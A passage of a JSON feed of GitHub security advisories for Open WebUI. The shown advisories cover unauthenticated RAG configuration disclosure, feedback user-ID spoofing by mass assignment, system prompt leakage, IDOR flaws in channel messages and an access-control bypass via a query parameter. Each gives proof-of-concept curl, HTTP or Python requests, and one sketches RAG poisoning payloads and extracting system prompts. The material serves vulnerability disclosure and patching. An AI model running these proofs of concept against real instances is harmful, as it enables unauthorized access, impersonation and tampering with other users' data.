them.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-14T20:26:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4g37-7p2c-38r9","https://github.com/open-webui/open-webui/pull/22109","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45398","https://github.com/advisories/GHSA-4g37-7p2c-38r9"],"source_kind":"github","identifiers":["GHSA-4g37-7p2c-38r9","CVE-2026-45398"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.088Z","epss_percentage":0.00331,"epss_percentile":0.25523,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ZzM3LTdwMmMtMzhyOc4ABW5D","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00ZzM3LTdwMmMtMzhyOc4ABW5D","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00ZzM3LTdwMmMtMzhyOc4ABW5D/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02NXBnLXFoaHctbXh3Z84ABW5C","url":"https://github.com/advisories/GHSA-65pg-qhhw-mxwg","title":"Open WebUI Vulnerable to Unauthenticated RAG Configuration Disclosure","description":"**Vulnerability Type:** Information Disclosure / Missing Authentication  \n**Severity:** Medium  \n**Component:** `backend/open_webui/routers/retrieval.py` — `get_status()` (`GET /`)  \n**Affected Endpoint:** `GET /api/v1/retrieval/`  \n**Affected Version:** Open WebUI `main` branch — confirmed unpatched through **v0.9.2**  \n**Authentication Required:** None — internet-facing with zero credentials  \n**CVSSv3.1 Score:** 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n---\n\n## Summary\n\n`GET /api/v1/retrieval/` returns live RAG pipeline configuration to any unauthenticated HTTP client. No `Authorization` header, cookie, or API key is required. Every adjacent endpoint on the same router (`/embedding`, `/config`) is correctly guarded by `get_admin_user` making this a targeted omission.\n\n---\n\n## Root Cause\n\n`backend/open_webui/routers/retrieval.py:262`\n\n```python\n@router.get('/')\nasync def get_status(request: Request):   # ← no Depends(get_verified_user)\n    return {\n        'status': True,\n        'CHUNK_SIZE': request.app.state.config.CHUNK_SIZE,\n        'CHUNK_OVERLAP': request.app.state.config.CHUNK_OVERLAP,\n        'RAG_TEMPLATE': request.app.state.config.RAG_TEMPLATE,\n        'RAG_EMBEDDING_ENGINE': request.app.state.config.RAG_EMBEDDING_ENGINE,\n        'RAG_EMBEDDING_MODEL': request.app.state.config.RAG_EMBEDDING_MODEL,\n        'RAG_RERANKING_MODEL': request.app.state.config.RAG_RERANKING_MODEL,\n        'RAG_EMBEDDING_BATCH_SIZE': request.app.state.config.RAG_EMBEDDING_BATCH_SIZE,\n        'ENABLE_ASYNC_EMBEDDING': request.app.state.config.ENABLE_ASYNC_EMBEDDING,\n        'RAG_EMBEDDING_CONCURRENT_REQUESTS': request.app.state.config.RAG_EMBEDDING_CONCURRENT_REQUESTS,\n    }\n```\n\nCompare with every adjacent endpoint on the same router:\n\n```python\n@router.get('/embedding')\nasync def get_embedding_config(request: Request, user=Depends(get_admin_user)):  # ✅\n\n@router.get('/config')\nasync def get_rag_config(request: Request, user=Depends(get_admin_user)):        # ✅\n```\n\n---\n\n## Proof Of Concept — No Token Required\n\n```bash\ncurl -s http://TARGET/api/v1/retrieval/\n```\n\n```json\n{\n  \"status\": true,\n  \"CHUNK_SIZE\": 1000,\n  \"CHUNK_OVERLAP\": 100,\n  \"RAG_TEMPLATE\": \"### Task:\\nRespond to the user query using the provided context...\\n\u003ccontext\u003e\\n{{CONTEXT}}\\n\u003c/context\u003e\",\n  \"RAG_EMBEDDING_ENGINE\": \"\",\n  \"RAG_EMBEDDING_MODEL\": \"sentence-transformers/all-MiniLM-L6-v2\",\n  \"RAG_RERANKING_MODEL\": \"\",\n  \"RAG_EMBEDDING_BATCH_SIZE\": 1,\n  \"ENABLE_ASYNC_EMBEDDING\": true,\n  \"RAG_EMBEDDING_CONCURRENT_REQUESTS\": 0\n}\n```\n\n---\n\n## Disclosed Information and Its Value to an Attacker\n\n| Field | What it reveals |\n|---|---|\n| `RAG_EMBEDDING_ENGINE` | Backend type (OpenAI, Ollama, Azure, etc.) |\n| `RAG_EMBEDDING_MODEL` | Exact model name — reveals embedding model |\n| `RAG_RERANKING_MODEL` | Reranker in use — reveals reranker |\n| `RAG_TEMPLATE` | **RAG template** — exposes the RAG template |\n| `CHUNK_SIZE` / `CHUNK_OVERLAP` | Chunking parameters — enables exact reconstruction of how documents are split and retrieved |\n\n---\n\n## Attack Scenario\n\n1. Attacker sends one unauthenticated HTTP GET to `/api/v1/retrieval/`.\n2. Response reveals the embedding model and chunking parameters.\n3. Attacker uses the exact chunk size/overlap to craft RAG poisoning payloads that are guaranteed to be retrieved.\n\n---\n\n## Impact\n\n1. **RAG template disclosure**\n2. **Infrastructure fingerprinting** — embedding engine and model name reveal the AI stack to an internet scanner\n3. **RAG attack surface mapping** — chunk parameters enable precise calculation of retrieval boundaries\n4. **Zero-effort recon** — no brute force, no credentials, no rate-limit concern. Single request from any IP.\n\n---\n\n## Recommended Fix\n\nAdd `get_verified_user` dependency (or `get_admin_user` for stricter control):\n\n```python\n# BEFORE (vulnerable)\n@router.get('/')\nasync def get_status(request: Request):\n\n\n# AFTER\n@router.get('/')\nasync def get_status(request: Request, user=Depends(get_verified_user)):\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:26:34.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45397","https://github.com/advisories/GHSA-65pg-qhhw-mxwg"],"source_kind":"github","identifiers":["GHSA-65pg-qhhw-mxwg","CVE-2026-45397"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.089Z","epss_percentage":0.0075,"epss_percentile":0.51529,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02NXBnLXFoaHctbXh3Z84ABW5C","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02NXBnLXFoaHctbXh3Z84ABW5C","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02NXBnLXFoaHctbXh3Z84ABW5C/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yam1wLXZqZjItcWY0Z84ABW5B","url":"https://github.com/advisories/GHSA-rjmp-vjf2-qf4g","title":"Open WebUI: Mass Assignment via FeedbackForm extra=allow Allows Feedback User ID Spoofing and Evaluation Data Manipulation","description":"# Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation\n\n## Summary\n\nThe `POST /api/v1/evaluations/feedback` endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via `FeedbackForm`, which uses `model_config = ConfigDict(extra='allow')`. Due to an insecure dictionary merge order in `insert_new_feedback()`, an authenticated attacker can inject a `user_id` field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing.\n\n## Details\n\nThe vulnerability exists in two layers:\n\n### 1. Model Layer — Insecure Dict Merge Order\n\n**File:** `backend/open_webui/models/feedbacks.py`, lines 148–160\n\n```python\nasync def insert_new_feedback(\n    self, user_id: str, form_data: FeedbackForm, db: Optional[AsyncSession] = None\n) -\u003e Optional[FeedbackModel]:\n    async with get_async_db_context(db) as db:\n        id = str(uuid.uuid4())\n        feedback = FeedbackModel(\n            **{\n                'id': id,\n                'user_id': user_id,       # ← Server-set from auth token\n                'version': 0,\n                **form_data.model_dump(),  # ← OVERWRITES 'id', 'user_id', 'version'\n                'created_at': int(time.time()),\n                'updated_at': int(time.time()),\n            }\n        )\n```\n\nIn Python, when a dictionary literal contains duplicate keys, the **last value wins**. Since `**form_data.model_dump()` appears after `'user_id': user_id`, any `user_id` field in the form data overwrites the authenticated user's ID.\n\n### 2. Schema Layer — `extra='allow'` on Request Form\n\n**File:** `backend/open_webui/models/feedbacks.py`, line 106\n\n```python\nclass FeedbackForm(BaseModel):\n    type: str\n    data: Optional[RatingData] = None\n    meta: Optional[dict] = None\n    snapshot: Optional[SnapshotData] = None\n    model_config = ConfigDict(extra='allow')  # ← Accepts arbitrary extra fields\n```\n\nThe `extra='allow'` config means Pydantic will accept and preserve any extra fields in the request body, including `user_id`, `id`, and `version`. These are then spread into the `FeedbackModel` constructor, overwriting server-set values.\n\n### Contrast with Secure Pattern\n\nOther models in the same codebase use the correct ordering. For example, `backend/open_webui/models/functions.py`, line 120:\n\n```python\nfunction = FunctionModel(**{\n    **form_data.model_dump(),   # ← Spread FIRST\n    'user_id': user_id,         # ← Server value AFTER → always wins\n})\n```\n\nAnd `ModelForm` at `backend/open_webui/models/models.py` uses `extra='ignore'`, which is the strictest approach.\n\n## Impact\n\n### 1. User Identity Spoofing\nAn attacker can create feedback records attributed to any user by specifying their `user_id`. The admin export endpoint (`GET /api/v1/evaluations/feedbacks/export`) and admin list (`GET /api/v1/evaluations/feedbacks/all`) will show the spoofed `user_id` as the feedback author.\n\n### 2. Model Evaluation Leaderboard Manipulation\nThe Elo rating system at `backend/open_webui/routers/evaluations.py` computes model rankings directly from feedback records. An attacker can inject fake rating feedback to:\n- Artificially inflate ratings for a specific model\n- Deflate ratings for competitor models\n- Make organizational model evaluation decisions unreliable\n\n### 3. Record ID Control\nBy injecting a custom `id`, an attacker controls the UUID of the feedback record. While this won't overwrite existing records (primary key constraint), it enables predictable record IDs that could be useful in other attack chains.\n\n## PoC\n\n```python\nimport requests\n\nBASE_URL = \"http://localhost:8080\"\n\n# 1. Login as attacker\nsession = requests.Session()\nlogin_resp = session.post(f\"{BASE_URL}/api/v1/auths/signin\", json={\n    \"email\": \"attacker@example.com\",\n    \"password\": \"attackerpass\"\n})\ntoken = login_resp.json()[\"token\"]\nheaders = {\"Authorization\": f\"Bearer {token}\"}\n\n# 2. Create feedback attributed to a different user (victim)\nVICTIM_USER_ID = \"12345678-aaaa-bbbb-cccc-000000000000\"\n\nresp = session.post(\n    f\"{BASE_URL}/api/v1/evaluations/feedback\",\n    headers=headers,\n    json={\n        \"type\": \"rating\",\n        \"data\": {\n            \"model_id\": \"gpt-4o\",\n            \"rating\": 1,\n            \"sibling_model_ids\": [\"claude-3-opus\"],\n        },\n        # Mass assignment: these extra fields are accepted due to extra='allow'\n        # and overwrite server-set values due to dict merge order\n        \"user_id\": VICTIM_USER_ID,  # Overwrites authenticated user ID\n        \"version\": 999,             # Overwrites default version\n    }\n)\n\nfeedback = resp.json()\nprint(f\"Feedback created with user_id: {feedback['user_id']}\")\n# Expected: attacker's own user_id\n# Actual: VICTIM_USER_ID (12345678-aaaa-bbbb-cccc-000000000000)\nassert feedback[\"user_id\"] == VICTIM_USER_ID, \"Mass assignment successful!\"\n```\n\n## Severity\n\n**CVSS 3.1:** 5.4 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L`\n\n- **Attack Vector:** Network\n- **Attack Complexity:** Low\n- **Privileges Required:** Low (any authenticated user)\n- **User Interaction:** None\n- **Impact:** Integrity (feedback data falsification) + limited Availability (leaderboard reliability)\n\n## Suggested Remediation\n\n### Option 1: Fix dict merge order (minimal fix)\n```python\nfeedback = FeedbackModel(\n    **{\n        **form_data.model_dump(),   # Spread FIRST\n        'id': id,                    # Server values AFTER (always win)\n        'user_id': user_id,\n        'version': 0,\n        'created_at': int(time.time()),\n        'updated_at': int(time.time()),\n    }\n)\n```\n\n### Option 2: Remove `extra='allow'` from FeedbackForm (recommended)\n```python\nclass FeedbackForm(BaseModel):\n    type: str\n    data: Optional[RatingData] = None\n    meta: Optional[dict] = None\n    snapshot: Optional[SnapshotData] = None\n    model_config = ConfigDict(extra='ignore')  # Reject unexpected fields\n```\n\n### Option 3: Explicit field assignment (most secure)\n```python\nfeedback = FeedbackModel(\n    id=str(uuid.uuid4()),\n    user_id=user_id,\n    version=0,\n    type=form_data.type,\n    data=form_data.data.model_dump() if form_data.data else {},\n    meta=form_data.meta or {},\n    snapshot=form_data.snapshot.model_dump() if form_data.snapshot else {},\n    created_at=int(time.time()),\n    updated_at=int(time.time()),\n)\n```\n\n## Affected Versions\n\n- v0.9.2 (current latest, confirmed vulnerable)\n- Likely all versions since feedback/evaluation feature was introduced\n\n## References\n\n- Prior advisory: \"Mass Assignment via Pydantic extra='allow' Allows Creating Folders in Other Users' Accounts\" (patched in v0.9.0) — same root cause class, different endpoint","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:26:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45396","https://github.com/advisories/GHSA-rjmp-vjf2-qf4g"],"source_kind":"github","identifiers":["GHSA-rjmp-vjf2-qf4g","CVE-2026-45396"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.089Z","epss_percentage":0.00307,"epss_percentile":0.22513,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yam1wLXZqZjItcWY0Z84ABW5B","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yam1wLXZqZjItcWY0Z84ABW5B","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yam1wLXZqZjItcWY0Z84ABW5B/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oMmN3LTdxdzktNTZ4cs4ABW4_","url":"https://github.com/advisories/GHSA-h2cw-7qw9-56xr","title":"Open WebUI: Sharing models for others to use (read permission) also exposes model details (system prompt leakage)","description":"### Summary\nWhen setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt.\n\nHowever users may consider their system prompt confidential, so we consider this a security issue.\n\nCompare https://genai.owasp.org/llmrisk/llm072025-system-prompt-leakage/ or prompt injections to get popular chatbots on the internet to reveal their prompt.\n\n### Details\n\nWe discovered that users can open the workspace model edit page /workspace/models/edit?id=notmymodel for models that do not appear in their workspace.\n\nSaving is not possible, that permission check is correct.\n\nOn the API level:\n\n- ```/api/v1/models/model?id=notmymodel``` -\u003e returns the model details, most importantly params.system\n- even though ```/api/v1/models/list``` does NOT contain the model since it checks for write permission.\n- ```/api/models``` contains the model correctly and does not reveal the system prompt.\n\nIt seems inconsistent that the REST API list does not contain an item, but if you know the id, you can access it anyway.\n\n### PoC\n- create model\n- give read permission to group with another user\n- other user can access ```/api/v1/models/model?id=notmymodel```\n\n### Impact\nSystem prommpt leakage\n\nIf this is intended behavior for the \"read\" permission, maybe there should be an additional \"use\" permission (which would be 99% of use cases of the read permission i believe).","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:26:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45387","https://github.com/advisories/GHSA-h2cw-7qw9-56xr"],"source_kind":"github","identifiers":["GHSA-h2cw-7qw9-56xr","CVE-2026-45387"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.090Z","epss_percentage":0.0022,"epss_percentile":0.12276,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMmN3LTdxdzktNTZ4cs4ABW4_","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oMmN3LTdxdzktNTZ4cs4ABW4_","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMmN3LTdxdzktNTZ4cs4ABW4_/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01Z2M2LXhodjQtMndnNs4ABW4-","url":"https://github.com/advisories/GHSA-5gc6-xhv4-2wg6","title":"Open WebUI has an IDOR vulnerability in the pin_channel_message API endpoint","description":"### Summary\n`Pin/Unpin` is a write operation (modifies the message's `is_pinned `, `pinned_by`, `pinned_at` fields), but in standard channels it only checks `read` permission, allowing users with read-only access to pin/unpin any message.\n\n### Details\nhttps://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L1218\n\n```\n@router.post('/{id}/messages/{message_id}/pin', response_model=Optional[MessageUserResponse])\nasync def pin_channel_message(\n    request: Request,\n    id: str,\n    message_id: str,\n    form_data: PinMessageForm,\n    user=Depends(get_verified_user),\n    db: Session = Depends(get_session),\n):\n    check_channels_access(request)\n    channel = Channels.get_channel_by_id(id, db=db)\n    if not channel:\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=ERROR_MESSAGES.NOT_FOUND)\n\n    if channel.type in ['group', 'dm']:\n        if not Channels.is_user_channel_member(channel.id, user.id, db=db):\n            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n    else:\n        if user.role != 'admin' and not channel_has_access(user.id, channel, permission='read', db=db):\n            raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n```\n\nThe `channel_has_access` function https://github.com/open-webui/open-webui/blob/9bd84258d09eefe7bf975878fb0e31a5dadfe0f8/backend/open_webui/routers/channels.py#L75 checks user permissions against the `AccessGrants` table:\n\n```\ndef channel_has_access(\n    user_id: str,\n    channel: ChannelModel,\n    permission: str = 'read',  # 'read' or 'write'\n    strict: bool = True,\n    db: Optional[Session] = None,\n) -\u003e bool:\n    if AccessGrants.has_access(\n        user_id=user_id,\n        resource_type='channel',\n        resource_id=channel.id,\n        permission=permission,\n        db=db,\n    ):\n        return True\n    # ...\n```\n\nThe `AccessGrant` table distinguishes between `read` and `write` permission levels.\n\n### PoC\n`admin` creates Standard Channel with Read-Only Access for `test1` :\n\n```\nPOST /api/v1/channels/create\nAuthorization: \nContent-Type: application/json\n\n{\n  \"name\": \"pin-test-standard\",\n  \"access_grants\": [\n    {\n      \"principal_type\": \"user\",\n      \"principal_id\": \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n      \"permission\": \"read\"\n    }\n  ]\n}\n```\n\n`admin` posts a Message in the Channel,  and  `test1` has `read` permission only.\n\u003cimg width=\"1024\" height=\"423\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e9912bd7-3908-44f2-8984-22d0535dc66f\" /\u003e\n\n`test1` attempts to Pin Message:\n\n```\nPOST /api/v1/channels/0699b656-578f-4976-94b0-65e2b19752fd/messages/4797359b-aad5-4081-9617-e8ca58524a87/pin\nAuthorization: Bearer \u003ctest1_token\u003e\nContent-Type: application/json\n\n{\n  \"is_pinned\": true\n}\n```\n\n```\n{\n  \"id\": \"4797359b-aad5-4081-9617-e8ca58524a87\",\n  \"user_id\": \"28c859b7-84e2-4217-b4d7-3f0e43f7c4b9\",\n  \"is_pinned\": true,\n  \"pinned_by\": \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n  \"pinned_at\": 1774716314908288719,\n  \"content\": \"Admin announcement in standard channel - test1 should NOT be able to pin this\"\n}\n```\n\nSuccessfully pinned admin's message. `pinned_by` records test1's user ID.\n\u003cimg width=\"1024\" height=\"350\" alt=\"image\" src=\"https://github.com/user-attachments/assets/705b1f45-95a9-4e91-8a74-10bdbccde0b8\" /\u003e\n\n `test1` (Read-Only) can alse Unpin Message. The Pin/Unpin endpoint in standard channels only checks `read` permission, allowing read-only users to pin/unpin any message.\n\n### Impact\nRead-only users can pin irrelevant messages, disrupting important information display in the channel .\n\n### Recommended Fix\nChange the Pin endpoint's permission check from `read` to `write` .","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:25:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-5gc6-xhv4-2wg6","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45386","https://github.com/advisories/GHSA-5gc6-xhv4-2wg6"],"source_kind":"github","identifiers":["GHSA-5gc6-xhv4-2wg6","CVE-2026-45386"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.090Z","epss_percentage":0.00204,"epss_percentile":0.10289,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z2M2LXhodjQtMndnNs4ABW4-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01Z2M2LXhodjQtMndnNs4ABW4-","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c= 0.9.4"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z2M2LXhodjQtMndnNs4ABW4-/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13d2hxLWN4MjItZjd2ds4ABW49","url":"https://github.com/advisories/GHSA-wwhq-cx22-f7vv","title":"Open WebUI has an IDOR vulnerability in the update_message_by_id API endpoint","description":"### Summary\nAn IDOR vulnerability exists in the Channels feature of `Open WebUI`, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. This vulnerability affects the latest version (`v0.8.12`) of `Open WebUI`.\n\n### Details\nIn the `update_message_by_id` function, for `group` or `dm` type channels, only the caller's membership in the channel is checked via the `is_user_channel_member` function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. The problematic code is as follows [(https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355)](https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355) :\n\n```python\nif channel.type in ['group', 'dm']:\n    if not Channels.is_user_channel_member(channel.id, user.id, db=db):\n        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\nelse:\n    if (\n        user.role != 'admin'\n        and message.user_id != user.id\n        and not channel_has_access(user.id, channel, permission='write', strict=False, db=db)\n    ):\n        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n\ntry:\n    message = Messages.update_message_by_id(message_id, form_data, db=db)\n```\n\nNon-group/dm types include a check for the user ID, while the `group/dm` type clearly lacks this verification.\n\n### PoC\nThe `Channels` feature is disabled by default and can be enabled first through the `admin` interface.\n\u003cimg width=\"1024\" height=\"618\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a36502e9-c6cd-41cd-a69c-8b6ac809768f\" /\u003e\n\nCreate a `group` type channel with members including users `test1` and `test2`.\n\n```\nPOST /api/v1/channels/create HTTP/1.1\nContent-Type: application/json\n\n{\n  \"name\": \"idor-test-group\",\n  \"type\": \"group\",\n  \"user_ids\": [\n    \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n    \"b9997496-ff80-4c30-a366-95474f85e62b\"\n  ]\n}\n```\n\nUser `test2` sends a message in the channel.\n\n```\nPOST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/post HTTP/1.1\nContent-Type: application/json\nAuthorization: Bearer \u003ctest2_token\u003e\n\n{\"content\":\"This is test2 secret message\"}\n```\n\nUser `test1` can directly modify the message that `test2` just sent.\n\n```\nPOST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/e0824c09-5712-4400-9b7a-b08eefcf15d3/update HTTP/1.1\nContent-Type: application/json\nAuthorization: Bearer \u003ctest1_token\u003e\n\n{\"content\":\"HACKED BY TEST1 - message tampered!\"}\n```\n\u003cimg width=\"1024\" height=\"216\" alt=\"image\" src=\"https://github.com/user-attachments/assets/77646d01-d501-4732-ac37-3ffb69f9f01f\" /\u003e\n\nMessages sent by administrators can also be modified.\n\n\u003cimg width=\"1024\" height=\"419\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b32dc5eb-f810-41d3-b358-f000d8331761\" /\u003e\n\n\n### Impact\nMalicious users can arbitrarily tamper with messages published by other users (including administrators), allowing them to disseminate false information.\n\n### Suggested Fix\nAdd a message ownership check in the `group/dm` branch of `channels.py`.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-14T20:25:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv","https://github.com/open-webui/open-webui/releases/tag/v0.9.5","https://nvd.nist.gov/vuln/detail/CVE-2026-45385","https://github.com/advisories/GHSA-wwhq-cx22-f7vv"],"source_kind":"github","identifiers":["GHSA-wwhq-cx22-f7vv","CVE-2026-45385"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-14T21:00:17.481Z","updated_at":"2026-09-03T03:03:09.091Z","epss_percentage":0.0025,"epss_percentile":0.16115,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13d2hxLWN4MjItZjd2ds4ABW49","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13d2hxLWN4MjItZjd2ds4ABW49","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.5","vulnerable_version_range":"\u003c 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13d2hxLWN4MjItZjd2ds4ABW49/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12NnFmLTc1cHItcDk2bc4ABW48","url":"https://github.com/advisories/GHSA-v6qf-75pr-p96m","title":"Open WebUI: Authenticated users can bypass model access control via exposed query parameter [AI-ASSISTED]","description":"### Summary\n\nAn internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models.\n\n### Details\n\nThe `generate_chat_completion` route handlers in both `routers/openai.py` and `routers/ollama.py` declare `bypass_filter` as a function parameter:\n\n**`routers/openai.py`, line 937–941:**\n\n```python\n@router.post(\"/chat/completions\")\nasync def generate_chat_completion(\n    request: Request,\n    form_data: dict,\n    user=Depends(get_verified_user),\n    bypass_filter: Optional[bool] = False,\n    ...\n):\n```\n\n**`routers/ollama.py`, line 1283–1288:**\n\n```python\n@router.post(\"/api/chat\")\nasync def generate_chat_completion(\n    ...\n    bypass_filter: Optional[bool] = False,\n    ...\n):\n```\n\nBecause FastAPI automatically binds unrecognized function parameters to the query string, any HTTP client can set this value by appending `?bypass_filter=true` to the request URL.\n\nWhen `bypass_filter` is true, the access control check is skipped entirely:\n\n**`routers/openai.py`, line 980:**\n\n```python\nif not bypass_filter and user.role == \"user\":\n    # ACL check — skipped when bypass_filter is True\n```\n\nThis parameter is intended for internal use only — the server-side chat pipeline in `utils/chat.py` (lines 238, 253) passes `bypass_filter=True` as a Python function argument when making recursive calls to base models that have already been authorized. However, because it appears in the HTTP handler's signature, it is unintentionally exposed to external callers.\n\nThis is separate from the `BYPASS_MODEL_ACCESS_CONTROL` environment variable, which is a deliberate admin setting for trusted environments.\n\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nuv run --no-project --with requests finding_02_bypass_filter_acl_bypass.py [--base-url http://localhost:8089]\n\nFinding #2 — Unauthorized model access via bypass_filter query parameter\n\nSUMMARY:\n  The POST /openai/chat/completions and POST /ollama/api/chat endpoints expose\n  a bypass_filter query parameter as part of their FastAPI function signatures.\n  FastAPI automatically binds this to the query string. When an authenticated\n  user appends ?bypass_filter=true, the access control check is skipped:\n\n    if not 